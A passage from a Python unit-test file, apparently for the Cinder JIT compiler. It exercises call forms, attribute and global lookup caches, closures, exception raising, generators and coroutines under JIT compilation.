r = CallExTests._f1(*(1,), **{"b": 2})
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_class_static_kw_only(self):
r = CallKWArgsTests._f1(**{"b": 2, "a": 1})
self.assertEqual(r, (1, 2))
def _f2(self, a, b):
return self, a, b
@unittest.failUnlessJITCompiled
def test_call_method_kw_and_pos(self):
r = self._f2(*(1,), **{"b": 2})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_method_kw_only(self):
r = self._f2(**{"b": 2, "a": 1})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_and_pos(self):
f = self._f2
r = f(*(1,), **{"b": 2})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_only(self):
f = self._f2
r = f(**{"b": 2, "a": 1})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_and_pos(self):
o = _CallableObj()
r = o(*(1,), **{"b": 2})
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_only(self):
o = _CallableObj()
r = o(**{"b": 2, "a": 1})
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_c_func_pos_only(self):
self.assertEqual(len(*([2],)), 1)
@unittest.failUnlessJITCompiled
def test_call_c_func_pos_and_kw(self):
self.assertEqual(__import__(*("sys",), **{"globals": None}), sys)
class LoadMethodCacheTests(unittest.TestCase):
def test_type_modified(self):
class Oracle:
def meaning_of_life(self):
return 42
obj = Oracle()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
# Invalidate cache
def new_meaning_of_life(x):
return 0
Oracle.meaning_of_life = new_meaning_of_life
self.assertEqual(get_meaning_of_life(obj), 0)
def test_base_type_modified(self):
class Base:
def meaning_of_life(self):
return 42
class Derived(Base):
pass
obj = Derived()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
# Mutate Base. Should propagate to Derived and invalidate the cache.
def new_meaning_of_life(x):
return 0
Base.meaning_of_life = new_meaning_of_life
self.assertEqual(get_meaning_of_life(obj), 0)
def test_second_base_type_modified(self):
class Base1:
pass
class Base2:
def meaning_of_life(self):
return 42
class Derived(Base1, Base2):
pass
obj = Derived()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
# Mutate first base. Should propagate to Derived and invalidate the cache.
def new_meaning_of_life(x):
return 0
Base1.meaning_of_life = new_meaning_of_life
self.assertEqual(get_meaning_of_life(obj), 0)
def test_type_dunder_bases_reassigned(self):
class Base1:
pass
class Derived(Base1):
pass
# No shadowing happens between obj{1,2} and Derived, thus the now
# shadowing flag should be set
obj1 = Derived()
obj2 = Derived()
obj2.meaning_of_life = nothing
# Now obj2.meaning_of_life shadows Base.meaning_of_life
class Base2:
def meaning_of_life(self):
return 42
Derived.__bases__ = (Base2,)
# Attempt to prime the cache
self.assertEqual(get_meaning_of_life(obj1), 42)
self.assertEqual(get_meaning_of_life(obj1), 42)
# If flag is not correctly cleared when Derived.__bases__ is
# assigned we will end up returning 42
self.assertEqual(get_meaning_of_life(obj2), 0)
def _make_obj(self):
class Oracle:
def meaning_of_life(self):
return 42
obj = Oracle()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
return obj
def test_instance_assignment(self):
obj = self._make_obj()
obj.meaning_of_life = nothing
self.assertEqual(get_meaning_of_life(obj), 0)
def test_instance_dict_assignment(self):
obj = self._make_obj()
obj.__dict__["meaning_of_life"] = nothing
self.assertEqual(get_meaning_of_life(obj), 0)
def test_instance_dict_replacement(self):
obj = self._make_obj()
obj.__dict__ = {"meaning_of_life": nothing}
self.assertEqual(get_meaning_of_life(obj), 0)
def test_instance_dunder_class_assignment(self):
obj = self._make_obj()
class Other:
pass
other = Other()
other.meaning_of_life = nothing
other.__class__ = obj.__class__
self.assertEqual(get_meaning_of_life(other), 0)
def test_shadowcode_setattr(self):
"""sets attribute via shadow byte code, it should update the
type bit for instance shadowing"""
obj = self._make_obj()
obj.foo = 42
obj1 = type(obj)()
obj1.other = 100
def f(obj, set):
if set:
obj.meaning_of_life = nothing
yield 42
for i in range(100):
list(f(obj, False))
list(f(obj, True))
self.assertEqual(get_meaning_of_life(obj), 0)
def test_shadowcode_setattr_split(self):
"""sets attribute via shadow byte code on a split dict,
it should update the type bit for instance shadowing"""
obj = self._make_obj()
def f(obj, set):
if set:
obj.meaning_of_life = nothing
yield 42
for i in range(100):
list(f(obj, False))
list(f(obj, True))
self.assertEqual(get_meaning_of_life(obj), 0)
@unittest.failUnlessJITCompiled
def get_foo(obj):
return obj.foo
class LoadAttrCacheTests(unittest.TestCase):
def test_dict_reassigned(self):
class Base:
def __init__(self, x):
self.foo = x
obj1 = Base(100)
obj2 = Base(200)
# uncached
self.assertEqual(get_foo(obj1), 100)
# cached
self.assertEqual(get_foo(obj1), 100)
self.assertEqual(get_foo(obj2), 200)
obj1.__dict__ = {"foo": 200}
self.assertEqual(get_foo(obj1), 200)
self.assertEqual(get_foo(obj2), 200)
def test_dict_mutated(self):
class Base:
def __init__(self, foo):
self.foo = foo
obj = Base(100)
# uncached
self.assertEqual(get_foo(obj), 100)
# cached
self.assertEqual(get_foo(obj), 100)
obj.__dict__["foo"] = 200
self.assertEqual(get_foo(obj), 200)
def test_dict_resplit(self):
# This causes one resize of the instance dictionary, which should cause
# it to go from split -> combined -> split.
class Base:
def __init__(self):
self.foo, self.a, self.b = 100, 200, 300
self.c, self.d, self.e = 400, 500, 600
obj = Base()
# uncached
self.assertEqual(get_foo(obj), 100)
# cached
self.assertEqual(get_foo(obj), 100)
obj.foo = 800
self.assertEqual(get_foo(obj), 800)
def test_dict_combined(self):
class Base:
def __init__(self, foo):
self.foo = foo
obj1 = Base(100)
# uncached
self.assertEqual(get_foo(obj1), 100)
# cached
self.assertEqual(get_foo(obj1), 100)
obj2 = Base(200)
obj2.bar = 300
# At this point the dictionary should still be split
obj3 = Base(400)
obj3.baz = 500
# Assigning 'baz' should clear the cached key object for Base and leave
# existing instance dicts in the following states:
#
# obj1.__dict__ - Split
# obj2.__dict__ - Split
# obj3.__dict__ - Combined
obj4 = Base(600)
self.assertEqual(get_foo(obj1), 100)
self.assertEqual(get_foo(obj2), 200)
self.assertEqual(get_foo(obj3), 400)
self.assertEqual(get_foo(obj4), 600)
@unittest.failUnlessJITCompiled
def set_foo(x, val):
x.foo = val
class DataDescr:
def __init__(self, val):
self.val = val
self.invoked = False
def __get__(self, obj, typ):
return self.val
def __set__(self, obj, val):
self.invoked = True
class StoreAttrCacheTests(unittest.TestCase):
def test_data_descr_attached(self):
class Base:
def __init__(self, x):
self.foo = x
obj = Base(100)
# Uncached
set_foo(obj, 200)
# Cached
set_foo(obj, 200)
self.assertEqual(obj.foo, 200)
# Attaching a data descriptor to the type should invalidate the cache
# and prevent future caching
descr = DataDescr(300)
Base.foo = descr
set_foo(obj, 200)
self.assertEqual(obj.foo, 300)
self.assertTrue(descr.invoked)
descr.invoked = False
set_foo(obj, 400)
self.assertEqual(obj.foo, 300)
self.assertTrue(descr.invoked)
def test_swap_split_dict_with_combined(self):
class Base:
def __init__(self, x):
self.foo = x
obj = Base(100)
# Uncached
set_foo(obj, 200)
# Cached
set_foo(obj, 200)
self.assertEqual(obj.foo, 200)
# At this point obj should have a split dictionary for attribute
# storage. We're going to swap it out with a combined dictionary
# and verify that attribute stores still work as expected.
d = {"foo": 300}
obj.__dict__ = d
set_foo(obj, 400)
self.assertEqual(obj.foo, 400)
self.assertEqual(d["foo"], 400)
def test_swap_combined_dict_with_split(self):
class Base:
def __init__(self, x):
self.foo = x
# Swap out obj's dict with a combined dictionary. Priming the IC
# for set_foo will result in it expecting a combined dictionary
# for instances of type Base.
obj = Base(100)
obj.__dict__ = {"foo": 100}
# Uncached
set_foo(obj, 200)
# Cached
set_foo(obj, 200)
self.assertEqual(obj.foo, 200)
# obj2 should have a split dictionary used for attribute storage
# which will result in a cache miss in the IC
obj2 = Base(300)
set_foo(obj2, 400)
self.assertEqual(obj2.foo, 400)
def test_split_dict_no_slot(self):
class Base:
pass
# obj is a split dict
obj = Base()
obj.quox = 42
# obj1 is no longer split, but the assignment
# didn't go through _PyObjectDict_SetItem, so the type
# still has a valid CACHED_KEYS
obj1 = Base()
obj1.__dict__["other"] = 100
# now we try setting foo on obj1, do the set on obj1
# while setting up the cache, but attempt to create a cache
# with an invalid val_offset because there's no foo
# entry in the cached keys.
set_foo(obj1, 300)
self.assertEqual(obj1.foo, 300)
set_foo(obj, 400)
self.assertEqual(obj1.foo, 300)
class LoadGlobalCacheTests(unittest.TestCase):
def setUp(self):
global license, a_global
try:
del license
except NameError:
pass
try:
del a_global
except NameError:
pass
@staticmethod
def set_global(value):
global a_global
a_global = value
@staticmethod
@unittest.failUnlessJITCompiled
def get_global():
return a_global
@staticmethod
def del_global():
global a_global
del a_global
@staticmethod
def set_license(value):
global license
license = value
@staticmethod
def del_license():
global license
del license
@unittest.failUnlessJITCompiled
def test_simple(self):
global a_global
self.set_global(123)
self.assertEqual(a_global, 123)
self.set_global(456)
self.assertEqual(a_global, 456)
@unittest.failUnlessJITCompiled
def test_shadow_builtin(self):
self.assertIs(license, builtins.license)
self.set_license(0xDEADBEEF)
self.assertIs(license, 0xDEADBEEF)
self.del_license()
self.assertIs(license, builtins.license)
@unittest.failUnlessJITCompiled
def test_shadow_fake_builtin(self):
self.assertRaises(NameError, self.get_global)
builtins.a_global = "poke"
self.assertEqual(a_global, "poke")
self.set_global("override poke")
self.assertEqual(a_global, "override poke")
self.del_global()
self.assertEqual(a_global, "poke")
# We don't support DELETE_ATTR yet.
delattr(builtins, "a_global")
self.assertRaises(NameError, self.get_global)
class prefix_str(str):
def __new__(ty, prefix, value):
s = super().__new__(ty, value)
s.prefix = prefix
return s
def __hash__(self):
return hash(self.prefix + self)
def __eq__(self, other):
return (self.prefix + self) == other
@unittest.failUnlessJITCompiled
def test_weird_key_in_globals(self):
global a_global
self.assertRaises(NameError, self.get_global)
globals()[self.prefix_str("a_glo", "bal")] = "a value"
self.assertEqual(a_global, "a value")
self.assertEqual(self.get_global(), "a value")
class MyGlobals(dict):
def __getitem__(self, key):
if key == "knock_knock":
return "who's there?"
return super().__getitem__(key)
@with_globals(MyGlobals())
def return_knock_knock(self):
return knock_knock
def test_dict_subclass_globals(self):
self.assertEqual(self.return_knock_knock(), "who's there?")
@unittest.failUnlessJITCompiled
def _test_unwatch_builtins(self):
self.set_global("hey")
self.assertEqual(self.get_global(), "hey")
builtins.__dict__[42] = 42
def test_unwatch_builtins(self):
try:
self._test_unwatch_builtins()
finally:
del builtins.__dict__[42]
class ClosureTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_cellvar(self):
a = 1
def foo():
return a
self.assertEqual(foo(), 1)
@unittest.failUnlessJITCompiled
def test_two_cellvars(self):
a = 1
b = 2
def g():
return a + b
self.assertEqual(g(), 3)
@unittest.failUnlessJITCompiled
def test_cellvar_argument(self):
def foo():
self.assertEqual(1, 1)
foo()
@unittest.failUnlessJITCompiled
def test_cellvar_argument_modified(self):
self_ = self
def foo():
nonlocal self
self = 1
self_.assertIs(self, self_)
foo()
self_.assertEqual(self, 1)
@unittest.failUnlessJITCompiled
def _cellvar_unbound(self):
b = a
a = 1
def g():
return a
def test_cellvar_unbound(self):
with self.assertRaises(UnboundLocalError) as ctx:
self._cellvar_unbound()
self.assertEqual(
str(ctx.exception), "local variable 'a' referenced before assignment"
)
def test_freevars(self):
x = 1
@unittest.failUnlessJITCompiled
def nested():
return x
x = 2
self.assertEqual(nested(), 2)
def test_freevars_multiple_closures(self):
def get_func(a):
@unittest.failUnlessJITCompiled
def f():
return a
return f
f1 = get_func(1)
f2 = get_func(2)
self.assertEqual(f1(), 1)
self.assertEqual(f2(), 2)
def test_nested_func(self):
@unittest.failUnlessJITCompiled
def add(a, b):
return a + b
self.assertEqual(add(1, 2), 3)
self.assertEqual(add("eh", "bee"), "ehbee")
@staticmethod
def make_adder(a):
@unittest.failUnlessJITCompiled
def add(b):
return a + b
return add
def test_nested_func_with_closure(self):
add_3 = self.make_adder(3)
add_7 = self.make_adder(7)
self.assertEqual(add_3(10), 13)
self.assertEqual(add_7(12), 19)
self.assertEqual(add_3(add_7(-100)), -90)
with self.assertRaises(TypeError):
add_3("ok")
def test_nested_func_with_different_globals(self):
@unittest.failUnlessJITCompiled
@with_globals({"A_GLOBAL_CONSTANT": 0xDEADBEEF})
def return_global():
return A_GLOBAL_CONSTANT
self.assertEqual(return_global(), 0xDEADBEEF)
return_other_global = with_globals({"A_GLOBAL_CONSTANT": 0xFACEB00C})(
return_global
)
self.assertEqual(return_other_global(), 0xFACEB00C)
self.assertEqual(return_global(), 0xDEADBEEF)
self.assertEqual(return_other_global(), 0xFACEB00C)
def test_nested_func_outlives_parent(self):
@unittest.failUnlessJITCompiled
def nested(x):
@unittest.failUnlessJITCompiled
def inner(y):
return x + y
return inner
nested_ref = weakref.ref(nested)
add_5 = nested(5)
nested = None
self.assertIsNone(nested_ref())
self.assertEqual(add_5(10), 15)
class TempNameTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _tmp_name(self, a, b):
tmp1 = "hello"
c = a + b
return tmp1
def test_tmp_name(self):
self.assertEqual(self._tmp_name(1, 2), "hello")
@unittest.failUnlessJITCompiled
def test_tmp_name2(self):
v0 = 5
self.assertEqual(v0, 5)
class DummyContainer:
def __len__(self):
raise Exception("hello!")
class ExceptionInConditional(unittest.TestCase):
@unittest.failUnlessJITCompiled
def doit(self, x):
if x:
return 1
return 2
def test_exception_thrown_in_conditional(self):
with self.assertRaisesRegex(Exception, "hello!"):
self.doit(DummyContainer())
class JITCompileCrasherRegressionTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _fstring(self, flag, it1, it2):
for a in it1:
for b in it2:
if flag:
return f"{a}"
def test_fstring_no_fmt_spec_in_nested_loops_and_if(self):
self.assertEqual(self._fstring(True, [1], [1]), "1")
@unittest.failUnlessJITCompiled
async def _sharedAwait(self, x, y, z):
return await (x() if y else z())
def test_shared_await(self):
async def zero():
return 0
async def one():
return 1
with self.assertRaises(StopIteration) as exc:
self._sharedAwait(zero, True, one).send(None)
self.assertEqual(exc.exception.value, 0)
with self.assertRaises(StopIteration) as exc:
self._sharedAwait(zero, False, one).send(None)
self.assertEqual(exc.exception.value, 1)
def jitted_func():
return 1
class SomeValue:
def __init__(self):
self._finalizer = weakref.finalize(self, self._cleanup)
@classmethod
def _cleanup(cls):
# trigger frame materialization, it should deallocate tinyframe that was used to call t.jitted()
a = sys._getframe()
# invoke jitted func, that should reuse frame deallocated on previous line and reset its refcount to 1
jitted_func()
class SomeClass:
def nonjitted(self):
# suppress JIT
try:
pass
except:
pass
val = SomeValue()
def jitted(self):
self.nonjitted()
class TinyFrames(unittest.TestCase):
def test_dealloc_reused_frame(self):
# suppress JIT
try:
pass
except:
pass
c = SomeClass()
c.jitted()
class UnwindStateTests(unittest.TestCase):
def _raise(self):
# Separate from _copied_locals because we don't support RAISE_VARARGS
# yet.
raise RuntimeError()
@unittest.failUnlessJITCompiled
def _copied_locals(self, a):
b = c = a
self._raise()
def test_copied_locals_in_frame(self):
try:
self._copied_locals("hello")
except RuntimeError as re:
f_locals = re.__traceback__.tb_next.tb_frame.f_locals
self.assertEqual(
f_locals, {"self": self, "a": "hello", "b": "hello", "c": "hello"}
)
class ImportTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_import_name(self):
import math
self.assertEqual(int(math.pow(1, 2)), 1)
@unittest.failUnlessJITCompiled
def _fail_to_import_name(self):
import non_existent_module
def test_import_name_failure(self):
with self.assertRaises(ModuleNotFoundError):
self._fail_to_import_name()
@unittest.failUnlessJITCompiled
def test_import_from(self):
from math import pow as math_pow
self.assertEqual(int(math_pow(1, 2)), 1)
@unittest.failUnlessJITCompiled
def _fail_to_import_from(self):
from math import non_existent_attr
def test_import_from_failure(self):
with self.assertRaises(ImportError):
self._fail_to_import_from()
class RaiseTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _jitRaise(self, exc):
raise exc
@unittest.failUnlessJITCompiled
def _jitRaiseCause(self, exc, cause):
raise exc from cause
@unittest.failUnlessJITCompiled
def _jitReraise(self):
raise
def test_raise_type(self):
with self.assertRaises(ValueError):
self._jitRaise(ValueError)
def test_raise_value(self):
with self.assertRaises(ValueError) as exc:
self._jitRaise(ValueError(1))
self.assertEqual(exc.exception.args, (1,))
def test_raise_with_cause(self):
cause = ValueError(2)
cause_tb_str = f"{cause.__traceback__}"
with self.assertRaises(ValueError) as exc:
self._jitRaiseCause(ValueError(1), cause)
self.assertIs(exc.exception.__cause__, cause)
self.assertEqual(f"{exc.exception.__cause__.__traceback__}", cause_tb_str)
def test_reraise(self):
original_raise = ValueError(1)
with self.assertRaises(ValueError) as exc:
try:
raise original_raise
except ValueError:
self._jitReraise()
self.assertIs(exc.exception, original_raise)
def test_reraise_of_nothing(self):
with self.assertRaises(RuntimeError) as exc:
self._jitReraise()
self.assertEqual(exc.exception.args, ("No active exception to reraise",))
class GeneratorsTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _f1(self):
yield 1
def test_basic_operation(self):
g = self._f1()
self.assertEqual(g.send(None), 1)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertIsNone(exc.exception.value)
@unittest.failUnlessJITCompiled
def _f2(self):
yield 1
yield 2
return 3
def test_multi_yield_and_return(self):
g = self._f2()
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(None), 2)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertEqual(exc.exception.value, 3)
@unittest.failUnlessJITCompiled
def _f3(self):
a = yield 1
b = yield 2
return a + b
def test_receive_values(self):
g = self._f3()
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(100), 2)
with self.assertRaises(StopIteration) as exc:
g.send(1000)
self.assertEqual(exc.exception.value, 1100)
@unittest.failUnlessJITCompiled
def _f4(self, a):
yield a
yield a
return a
def test_one_arg(self):
g = self._f4(10)
self.assertEqual(g.send(None), 10)
self.assertEqual(g.send(None), 10)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertEqual(exc.exception.value, 10)
@unittest.failUnlessJITCompiled
def _f5(
self, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16
):
v = (
yield a1
+ a2
+ a3
+ a4
+ a5
+ a6
+ a7
+ a8
+ a9
+ a10
+ a11
+ a12
+ a13
+ a14
+ a15
+ a16
)
a1 <<= v
a2 <<= v
a3 <<= v
a4 <<= v
a5 <<= v
a6 <<= v
a7 <<= v
a8 <<= v
a9 <<= v
a10 <<= v
a11 <<= v
a12 <<= v
a13 <<= v
a14 <<= v
a15 <<= v
a16 <<= v
v = (
yield a1
+ a2
+ a3
+ a4
+ a5
+ a6
+ a7
+ a8
+ a9
+ a10
+ a11
+ a12
+ a13
+ a14
+ a15
+ a16
)
a1 <<= v
a2 <<= v
a3 <<= v
a4 <<= v
a5 <<= v
a6 <<= v
a7 <<= v
a8 <<= v
a9 <<= v
a10 <<= v
a11 <<= v
a12 <<= v
a13 <<= v
a14 <<= v
a15 <<= v
a16 <<= v
return (
a1
+ a2
+ a3
+ a4
+ a5
+ a6
+ a7
+ a8
+ a9
+ a10
+ a11
+ a12
+ a13
+ a14
+ a15
+ a16
)
def test_save_all_registers_and_spill(self):
g = self._f5(
0x1,
0x2,
0x4,
0x8,
0x10,
0x20,
0x40,
0x80,
0x100,
0x200,
0x400,
0x800,
0x1000,
0x2000,
0x4000,
0x8000,
)
self.assertEqual(g.send(None), 0xFFFF)
self.assertEqual(g.send(1), 0xFFFF << 1)
with self.assertRaises(StopIteration) as exc:
g.send(2)
self.assertEqual(exc.exception.value, 0xFFFF << 3)
def test_for_loop_driven(self):
l = []
for x in self._f2():
l.append(x)
self.assertEqual(l, [1, 2])
@unittest.failUnlessJITCompiled
def _f6(self):
i = 0
while i < 1000:
i = yield i
def test_many_iterations(self):
g = self._f6()
self.assertEqual(g.send(None), 0)
for i in range(1, 1000):
self.assertEqual(g.send(i), i)
with self.assertRaises(StopIteration) as exc:
g.send(1000)
self.assertIsNone(exc.exception.value)
def _f_raises(self):
raise ValueError
@unittest.failUnlessJITCompiled
def _f7(self):
self._f_raises()
yield 1
def test_raise(self):
g = self._f7()
with self.assertRaises(ValueError):
g.send(None)
def test_throw_into_initial_yield(self):
g = self._f1()
with self.assertRaises(ValueError):
g.throw(ValueError)
def test_throw_into_yield(self):
g = self._f2()
self.assertEqual(g.send(None), 1)
with self.assertRaises(ValueError):
g.throw(ValueError)
def test_close_on_initial_yield(self):
g = self._f1()
g.close()
def test_close_on_yield(self):
g = self._f2()
self.assertEqual(g.send(None), 1)
g.close()
@unittest.failUnlessJITCompiled
def _f8(self, a):
x += yield a
def test_do_not_deopt_before_initial_yield(self):
g = self._f8(1)
with self.assertRaises(UnboundLocalError):
g.send(None)
@unittest.failUnlessJITCompiled
def _f9(self, a):
yield
return a
def test_incref_args(self):
class X:
pass
g = self._f9(X())
g.send(None)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertIsInstance(exc.exception.value, X)
@unittest.failUnlessJITCompiled
def _f10(self, X):
x = X()
yield weakref.ref(x)
return x
def test_gc_traversal(self):
class X:
pass
g = self._f10(X)
weak_ref_x = g.send(None)
self.assertIn(weak_ref_x(), gc.get_objects())
referrers = gc.get_referrers(weak_ref_x())
self.assertEqual(len(referrers), 1)
if unittest.case.CINDERJIT_ENABLED:
self.assertIs(referrers[0], g)
else:
self.assertIs(referrers[0], g.gi_frame)
with self.assertRaises(StopIteration):
g.send(None)
def test_resuming_in_another_thread(self):
g = self._f1()
def thread_function(g):
self.assertEqual(g.send(None), 1)
with self.assertRaises(StopIteration):
g.send(None)
t = threading.Thread(target=thread_function, args=(g,))
t.start()
t.join()
def test_release_data_on_discard(self):
o = object()
base_count = sys.getrefcount(o)
g = self._f9(o)
self.assertEqual(sys.getrefcount(o), base_count + 1)
del g
self.assertEqual(sys.getrefcount(o), base_count)
@unittest.failUnlessJITCompiled
def _f12(self, g):
a = yield from g
return a
def test_yield_from_generator(self):
g = self._f12(self._f2())
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(None), 2)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertEqual(exc.exception.value, 3)
def test_yield_from_iterator(self):
g = self._f12([1, 2])
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(None), 2)
with self.assertRaises(StopIteration):
g.send(None)
def test_yield_from_forwards_raise_down(self):
def f():
try:
yield 1
except ValueError:
return 2
return 3
g = self._f12(f())
self.assertEqual(g.send(None), 1)
with self.assertRaises(StopIteration) as exc:
g.throw(ValueError)
self.assertEqual(exc.exception.value, 2)
def test_yield_from_forwards_raise_up(self):
def f():
raise ValueError
yield 1
g = self._f12(f())
with self.assertRaises(ValueError):
g.send(None)
def test_yield_from_passes_raise_through(self):
g = self._f12(self._f2())
self.assertEqual(g.send(None), 1)
with self.assertRaises(ValueError):
g.throw(ValueError)
def test_yield_from_forwards_close_down(self):
saw_close = False
def f():
nonlocal saw_close
try:
yield 1
except GeneratorExit:
saw_close = True
return 2
g = self._f12(f())
self.assertEqual(g.send(None), 1)
g.close()
self.assertTrue(saw_close)
def test_yield_from_passes_close_through(self):
g = self._f12(self._f2())
self.assertEqual(g.send(None), 1)
g.close()
def test_assert_on_yield_from_coro(self):
async def coro():
pass
c = coro()
with self.assertRaises(TypeError) as exc:
self._f12(c).send(None)
self.assertEqual(
str(exc.exception),
"cannot 'yield from' a coroutine object in a non-coroutine generator",
)
# Suppress warning
c.close()
def test_gen_close(self):
"""Finalize generators immediately on unwind.
Necessary to ensure that generator cleanups occur when they should.
"""
stack = []
try:
self._gen_close_jitme(stack)
except RuntimeError:
left_on_stack = list(stack)
else:
self.fail("RuntimeError should have been raised")
self.assertEqual(stack, [])
self.assertEqual(left_on_stack, [])
@unittest.failUnlessJITCompiled
def _gen_close_jitme(self, stack):
for x in self._gen_close_gen(stack):
if x == 1:
# _gen_close_gen needs to be finalized immediately when we
# unwind from here; our caller should never run within its context
raise RuntimeError("boom")
def _gen_close_gen(self, stack):
for x in [0, 1, 2]:
stack.append(x)
try:
yield x
finally:
assert stack.pop() == x
def test_gen_freelist(self):
"""Exercise making a JITted generator with gen_data memory off the freelist."""
# make and dealloc a small coro, which will put its memory area on the freelist
sc = self.small_coro()
with self.assertRaises(StopIteration):
sc.send(None)
del sc
# run another coro to verify we didn't put a bad pointer on the freelist
sc2 = self.small_coro()
with self.assertRaises(StopIteration):
sc2.send(None)
del sc2
# make a big coro and then deallocate it, bypassing the freelist
bc = self.big_coro()
with self.assertRaises(StopIteration):
bc.send(None)
del bc
@unittest.failUnlessJITCompiled
async def big_coro(self):
# This currently results in a max spill size of ~100, but that could
# change with JIT register allocation improvements. This test is only
# testing what it intends to as long as the max spill size of this
# function is greater than jit::kMinGenSpillWords. Ideally we'd assert
# that in the test, but neither value is introspectable from Python.
return dict(
a=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
b=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
c=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
d=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
e=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
f=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
g=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
h=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
)
@unittest.failUnlessJITCompiled
async def small_coro(self):
return 1
def test_generator_globals(self):
val1 = "a value"
val2 = "another value"
gbls = {"A_GLOBAL": val1}
@with_globals(gbls)
def gen():
yield A_GLOBAL
yield A_GLOBAL
g = gen()
self.assertIs(g.__next__(), val1)
gbls["A_GLOBAL"] = val2
del gbls
self.assertIs(g.__next__(), val2)
with self.assertRaises(StopIteration):
g.__next__()
class CoroutinesTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
async def _f1(self):
return 1
@unittest.failUnlessJITCompiled
async def _f2(self, await_target):
return await await_target
def test_basic_coroutine(self):
c = self._f2(self._f1())
with self.assertRaises(StopIteration) as exc:
c.send(None)
self.assertEqual(exc.exception.value, 1)
def test_cannot_await_coro_already_awaiting_on_a_sub_iterator(self):
class DummyAwaitable:
def __await__(self):
return iter([1])
c = self._f2(DummyAwaitable())
self.assertEqual(c.send(None), 1)
with self.assertRaises(RuntimeError) as exc:
self._f2(c).send(None)
self.assertEqual(str(exc.exception), "coroutine is being awaited already")
def test_works_with_asyncio(self):
try:
asyncio.run(self._f2(asyncio.sleep(0.1)))
finally:
# This is needed to avoid an "environment changed" error
asyncio.set_event_loop_policy(None)
@unittest.failUnlessJITCompiled
@asyncio.coroutine
def _f3(self):
yield 1
return 2
def test_pre_async_coroutine(self):
c = self._f3()
self.assertEqual(c.send(None), 1)
with self.assertRaises(StopIteration) as exc:
c.send(None)
self.assertEqual(exc.exception.value, 2)
@staticmethod
@unittest.failUnlessJITCompiled
async def _use_async_with(mgr_type):
async with mgr_type():
pass
def test_bad_awaitable_in_with(self):
class BadAEnter:
def __aenter__(self):
pass
async def __aexit__(self, exc, ty, tb):
pass
class BadAExit:
async def __aenter__(self):
pass
def __aexit__(self, exc, ty, tb):
pass
with self.assertRaisesRegex(
TypeError,
"'async with' received an object from __aenter__ "
"that does not implement __await__: NoneType",
):
asyncio.run(self._use_async_with(BadAEnter))
with self.assertRaisesRegex(
TypeError,
"'async with' received an object from __aexit__ "
"that does not implement __await__: NoneType",
):
asyncio.run(self._use_async_with(BadAExit))
class EagerCoroutineDispatch(StaticTestBase):
def _assert_awaited_flag_seen(self, async_f_under_test):
awaited_capturer = _testcapi.TestAwaitedCall()
self.assertIsNone(awaited_capturer.last_awaited())
coro = async_f_under_test(awaited_capturer)
# TestAwaitedCall doesn't actually return a coroutine. This doesn't
# matter though because by the time a TypeError is raised we run far
# enough to know if the awaited flag was passed.
with self.assertRaisesRegex(
TypeError, r".*can't be used in 'await' expression"
):
coro.send(None)
coro.close()
self.assertTrue(awaited_capturer.last_awaited())
self.assertIsNone(awaited_capturer.last_awaited())
def _assert_awaited_flag_not_seen(self, async_f_under_test):
awaited_capturer = _testcapi.TestAwaitedCall()
self.assertIsNone(awaited_capturer.last_awaited())
coro = async_f_under_test(awaited_capturer)
with self.assertRaises(StopIteration):
coro.send(None)
coro.close()
self.assertFalse(awaited_capturer.last_awaited())
self.assertIsNone(awaited_capturer.last_awaited())
@unittest.failUnlessJITCompiled
async def _call_ex(self, t):
t(*[1])
@unittest.failUnlessJITCompiled
async def _call_ex_awaited(self, t):
await t(*[1])
@unittest.failUnlessJITCompiled
async def _call_ex_kw(self, t):
t(*[1], **{2: 3})
@unittest.failUnlessJITCompiled
async def _call_ex_kw_awaited(self, t):
await t(*[1], **{2: 3})
@unittest.failUnlessJITCompiled
async def _call_method(self, t):
# https://stackoverflow.com/questions/19476816/creating-an-empty-object-in-python
o = type("", (), {})()
o.t = t
o.t()
@unittest.failUnlessJITCompiled
async def _call_method_awaited(self, t):
o = type("", (), {})()
o.t = t
await o.t()
@unittest.failUnlessJITCompiled
async def _vector_call(self, t):
t()
@unittest.failUnlessJITCompiled
